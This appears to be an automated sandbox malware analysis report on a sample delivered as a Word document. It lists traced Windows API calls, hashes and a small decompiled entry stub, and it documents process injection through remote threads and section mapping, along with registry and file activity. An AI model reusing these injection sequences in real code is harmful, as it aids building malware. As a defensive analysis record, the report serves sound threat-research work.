Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: apdsroxy.exe Analysis ID: 60981

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches:	39
Initial Analysis Report:	Open
Initial sample Analysis ID:	60981
Initial sample SHA 256:	93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name:	Request_592655.doc

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
